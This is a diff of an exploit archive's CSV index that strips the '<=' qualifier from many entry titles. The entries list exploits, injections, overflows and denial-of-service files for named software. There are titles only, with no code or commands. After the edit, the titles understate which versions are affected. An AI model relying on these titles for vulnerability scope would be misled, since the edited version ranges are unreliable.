18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 Database Backup Disclosure Exploit",2012-05-16,LiquidWorm,php,webapps,0 18890,platforms/multiple/dos/18890.txt,"Trigerring Java Code from a SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0 -18909,platforms/php/dos/18909.php,"PHP <= 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 +18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0 18893,platforms/hardware/remote/18893.py,"HP VSA Remote Command Execution Exploit",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18894,platforms/windows/dos/18894.txt,"Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034) (0Day)",2012-05-18,Cr4sh,windows,dos,0 @@ -16349,10 +16349,10 @@ id,file,description,date,author,platform,type,port 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 Virtual SAN Appliance Command Execution",2012-05-21,Metasploit,hardware,remote,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 -18910,platforms/php/dos/18910.php,"PHP <= 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 +18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 -18913,platforms/php/webapps/18913.php,"Supernews <= 2.6.1 - SQL Injection Exploit",2012-05-21,WhiteCollarGroup,php,webapps,0 +18913,platforms/php/webapps/18913.php,"Supernews 2.6.1 - SQL Injection Exploit",2012-05-21,WhiteCollarGroup,php,webapps,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow",2012-05-21,Metasploit,windows,local,0 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation Exploit",2012-05-22,sickness,windows,local,0 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent XSS",2012-05-18,"Henry Hoggard",php,webapps,0 @@ -16363,19 +16363,19 @@ id,file,description,date,author,platform,type,port 18918,platforms/multiple/dos/18918.txt,"Wireshark DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 18919,platforms/multiple/dos/18919.txt,"Wireshark Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 18920,platforms/multiple/dos/18920.txt,"Wireshark Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",multiple,dos,0 -18921,platforms/php/webapps/18921.txt,"Jaow <= 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 +18921,platforms/php/webapps/18921.txt,"Jaow 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,Metasploit,windows,local,0 18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos,0 18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,Metasploit,windows,remote,0 -18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 -18931,platforms/ios/dos/18931.rb,"iOS <= 5.1.1 - Safari Browser - JS match() & search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 +18950,platforms/php/webapps/18950.txt,"NewsAdd 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 +18931,platforms/ios/dos/18931.rb,"iOS 5.1.1 - Safari Browser - JS match() & search() Crash PoC",2012-05-25,"Alberto Ortega",ios,dos,0 18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,Metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,Metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution",2012-05-28,Metasploit,linux,remote,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 -18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 +18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0 18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos,0 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos,0 @@ -16392,8 +16392,8 @@ id,file,description,date,author,platform,type,port 18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload",2012-05-31,Metasploit,php,webapps,0 18958,platforms/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflows",2012-05-31,"High-Tech Bridge SA",windows,dos,0 18959,platforms/multiple/local/18959.txt,"Browser Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0 -18960,platforms/php/webapps/18960.txt,"NewsAdd <= 1.0 - (lerNoticia.php id) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 -18961,platforms/php/webapps/18961.txt,"Supernews <= 2.6.1 - (noticias.php cat) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18960,platforms/php/webapps/18960.txt,"NewsAdd 1.0 - (lerNoticia.php id) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18961,platforms/php/webapps/18961.txt,"Supernews 2.6.1 - (noticias.php cat) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 @@ -16404,7 +16404,7 @@ id,file,description,date,author,platform,type,port 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 -18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 +18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"WordPress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18988,platforms/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18989,platforms/php/webapps/18989.php,"WordPress Google Maps via Store Locator Plugin 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -16416,16 +16416,16 @@ id,file,description,date,author,platform,type,port 19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,Metasploit,windows,remote,0 18997,platforms/php/webapps/18997.php,"WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"WordPress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -18999,platforms/php/webapps/18999.php,"SN News <= 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 +18999,platforms/php/webapps/18999.php,"SN News 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 19012,platforms/php/webapps/19012.txt,"WordPress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 19013,platforms/php/webapps/19013.txt,"WordPress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 -19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 - (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 +19005,platforms/php/webapps/19005.txt,"SN News 1.2 - (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,Metasploit,windows,remote,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory Remote Code Execution",2012-06-10,Metasploit,windows,remote,0 -19007,platforms/php/webapps/19007.php,"PHPNet <= 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 +19007,platforms/php/webapps/19007.php,"PHPNet 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 19008,platforms/php/webapps/19008.php,"WordPress Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19009,platforms/php/webapps/19009.php,"WordPress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19016,platforms/php/webapps/19016.txt,"WordPress PICA Photo Gallery Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 @@ -16446,16 +16446,16 @@ id,file,description,date,author,platform,type,port 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload",2012-06-10,Metasploit,php,webapps,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 -19040,platforms/solaris/remote/19040.txt,"SunView (SunOS <= 4.1.1) selection_svc",1990-08-14,"Peter Shipley",solaris,remote,0 +19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) selection_svc",1990-08-14,"Peter Shipley",solaris,remote,0 19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot",1991-05-01,anonymous,aix,dos,0 -19042,platforms/solaris/dos/19042.txt,"SunOS <= 4.1.1 - /usr/release/bin/makeinstall",1999-11-23,anonymous,solaris,dos,0 -19043,platforms/aix/dos/19043.txt,"SunOS <= 4.1.1 - /usr/release/bin/winstall",1999-11-12,anonymous,aix,dos,0 -19044,platforms/solaris/remote/19044.txt,"SunOS <= 4.1.3 LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0 -19045,platforms/aix/dos/19045.txt,"SunOS <= 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0 +19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - /usr/release/bin/makeinstall",1999-11-23,anonymous,solaris,dos,0 +19043,platforms/aix/dos/19043.txt,"SunOS 4.1.1 - /usr/release/bin/winstall",1999-11-12,anonymous,aix,dos,0 +19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0 +19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 -19048,platforms/aix/remote/19048.txt,"IRIX <= 6.4 pfdisplay.cgi",1998-04-07,"J.A. Gutierrez",aix,remote,0 -19049,platforms/aix/dos/19049.txt,"BSDI <= 4.0 tcpmux / inetd Crash",1998-04-07,"Mark Schaefer",aix,dos,0 +19048,platforms/aix/remote/19048.txt,"IRIX 6.4 pfdisplay.cgi",1998-04-07,"J.A. Gutierrez",aix,remote,0 +19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd Crash",1998-04-07,"Mark Schaefer",aix,dos,0 19050,platforms/php/webapps/19050.txt,"WordPress wp-gpx-map 1.1.21 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19052,platforms/php/webapps/19052.txt,"WordPress User Meta 1.1.1 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 @@ -16466,9 +16466,9 @@ id,file,description,date,author,platform,type,port 19057,platforms/php/webapps/19057.txt,"WordPress drag and drop file upload 0.1 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19058,platforms/php/webapps/19058.txt,"WordPress Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,php,webapps,0 -19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 +19060,platforms/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE",1996-04-05,"Arthur Hagen",irix,local,0 -19067,platforms/irix/local/19067.txt,"SGI IRIX <= 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT",1996-11-22,"Yuri Volobuev",irix,local,0 +19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT",1996-11-22,"Yuri Volobuev",irix,local,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,Metasploit,php,webapps,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0 @@ -16489,49 +16489,49 @@ id,file,description,date,author,platform,type,port 19083,platforms/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 Share",1998-06-10,"Paul Boyer",windows,remote,0 19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1",1998-06-30,"Jeff Forristal",multiple,remote,0 19085,platforms/linux/dos/19085.c,"Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos,0 -19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath (1)",1999-02-09,"smiler and cossack",linux,remote,21 -19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 +19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath (1)",1999-02-09,"smiler and cossack",linux,remote,21 +19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2 & SCO Open Server 5.0.5 & ProFTPD 1.2 pre1 - realpath (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format DoS Exploit",2012-06-12,Cr4sh,windows,dos,0 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 -19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server <= 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0 +19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0 19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4.0/5.0 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0 19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 Path Embedded Code Execution",1999-04-20,Shadow,linux,local,0 -19096,platforms/linux/remote/19096.c,"RedHat Linux <= 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 +19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,Metasploit,hardware,remote,0 19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress uploadify.php - Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 -19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 -19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 -19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34_ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 -19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware <= 7.1.1 & SGI IRIX <= 5.3 & Sun Solaris <= 2.5.1",1997-11-24,anonymous,linux,remote,0 +19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 +19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 +19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34_ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 +19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 Count.cgi Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0 -19106,platforms/linux/local/19106.c,"BSDI BSD/OS <= 2.1 & FreeBSD <= 2.1_IBM AIX <= 4.2_SGI IRIX <= 6.4 & Sun SunOS <= 4.1.3",1996-07-03,"Jeff Uphoff",linux,local,0 +19106,platforms/linux/local/19106.c,"BSDI BSD/OS 2.1 & FreeBSD 2.1_IBM AIX 4.2_SGI IRIX 6.4 & Sun SunOS 4.1.3",1996-07-03,"Jeff Uphoff",linux,local,0 19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Buffer Overflow",1998-07-17,anonymous,linux,remote,0 -19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0_IBM AIX <= 4.3 & SCO Unixware 7.0 & Sun Solaris <= 2.6",1999-11-03,Mastoras,unix,local,0 +19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0_IBM AIX 4.3 & SCO Unixware 7.0 & Sun Solaris 2.6",1999-11-03,Mastoras,unix,local,0 19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow (1)",1998-06-27,"Seth McGann",linux,remote,0 19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0 19111,platforms/linux/remote/19111.c,"Multiple OSes - BIND Buffer Overflow (1)",1998-04-08,ROTShB,linux,remote,0 19112,platforms/linux/remote/19112.c,"Multiple OSes - BIND Buffer Overflow (2)",1998-04-08,prym,linux,remote,0 19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd",1999-01-02,"Tomas Halgas",windows,remote,23 -19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0 +19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 -19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX <= 4.0 D / FreeBSD <= 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX <= 3.2.5 / NetBSD 1.2 / Solaris <= 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",linux,dos,0 +19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",linux,dos,0 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0_Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0 -19119,platforms/linux/remote/19119.c,"HP HP-UX <= 10.34 rlpdaemon",1998-07-06,"RSI Advise",linux,remote,0 +19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon",1998-07-06,"RSI Advise",linux,remote,0 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1",1998-07-08,"Albert Nubdy",multiple,remote,0 -19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 - /etc/group missing results in Root access",1998-07-13,"Richard Thomas",linux,local,0 -19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0 +19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group missing results in Root access",1998-07-13,"Richard Thomas",linux,local,0 +19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D symlink",1998-07-15,emffmmadffsdf,linux,remote,0 19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 -19126,platforms/solaris/local/19126.txt,"Sun Solaris <= 2.6 power management",1998-07-16,"Ralf Lehmann",solaris,local,0 +19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management",1998-07-16,"Ralf Lehmann",solaris,local,0 19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 Security",1998-07-14,"Stefan Arentz",multiple,remote,0 -19128,platforms/solaris/local/19128.c,"Sun Solaris <= 7.0 sdtcm_convert",1998-10-23,UNYUN,solaris,local,0 +19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert",1998-10-23,UNYUN,solaris,local,0 19129,platforms/multiple/remote/19129.txt,"Microsoft IIS 4.0_Microsoft Site Server 3.0 Showcode ASP",1999-05-07,L0pht,multiple,remote,0 -19130,platforms/freebsd/local/19130.c,"FreeBSD <= 3.0 UNIX-domain panic",1999-05-05,"Lukasz Luzar",freebsd,local,0 -19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server <= 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 +19130,platforms/freebsd/local/19130.c,"FreeBSD 3.0 UNIX-domain panic",1999-05-05,"Lukasz Luzar",freebsd,local,0 +19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 19132,platforms/php/webapps/19132.txt,"myre real estate mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19133,platforms/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilites",2012-06-14,Vulnerability-Lab,php,webapps,0 19134,platforms/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 @@ -16550,25 +16550,25 @@ id,file,description,date,author,platform,type,port 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0 19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,Metasploit,windows,remote,0 19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0 -19413,platforms/windows/dos/19413.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 - (1)",1999-07-03,Coolio,windows,dos,0 +19413,platforms/windows/dos/19413.c,"Windows 95/98_Windows NT Enterprise Server 4.0 SP5_Windows NT Terminal Server 4.0 SP4_Windows NT Workstation 4.0 SP5 - (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and 